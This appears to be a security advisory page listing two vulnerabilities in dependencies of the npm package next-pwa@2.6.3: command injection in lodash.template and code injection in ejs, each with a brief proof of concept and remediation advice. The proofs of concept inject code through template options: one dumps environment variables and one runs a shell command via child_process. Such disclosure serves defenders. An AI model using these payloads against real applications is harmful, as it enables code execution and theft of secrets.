next-pwa@2.6.3

Vulnerabilities

2 via 2 paths

Dependencies

299

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
  • 1
Status
  • 2
  • 0
  • 0

high severity

Command Injection

  • Vulnerable module: lodash.template
  • Introduced through: workbox-webpack-plugin@5.1.4

Detailed paths

  • Introduced through: next-pwa@2.6.3 workbox-webpack-plugin@5.1.4 workbox-build@5.1.4 lodash.template@4.5.0

Overview

lodash.template is a The Lodash method _.template exported as a Node.js module.

Affected versions of this package are vulnerable to Command Injection via template.

PoC

var _ = require('lodash');

_.template('', { variable: '){console.log(process.env)}; with(obj' })()

Remediation

There is no fixed version for lodash.template.

References

medium severity

Arbitrary Code Injection

  • Vulnerable module: ejs
  • Introduced through: workbox-webpack-plugin@5.1.4

Detailed paths

  • Introduced through: next-pwa@2.6.3 workbox-webpack-plugin@5.1.4 workbox-build@5.1.4 @surma/rollup-plugin-off-main-thread@1.4.2 ejs@2.7.4

Overview

ejs is a popular JavaScript templating engine.

Affected versions of this package are vulnerable to Arbitrary Code Injection via the render and renderFile. If external input is flowing into the options parameter, an attacker is able run arbitrary code. This include the filename, compileDebug, and client option.

POC

let ejs = require('ejs')
ejs.render('./views/test.ejs',{
    filename:'/etc/passwd\nfinally { this.global.process.mainModule.require(\'child_process\').execSync(\'touch EJS_HACKED\') }',
    compileDebug: true,
    message: 'test',
    client: true
})

Remediation

Upgrade ejs to version 3.1.6 or higher.

References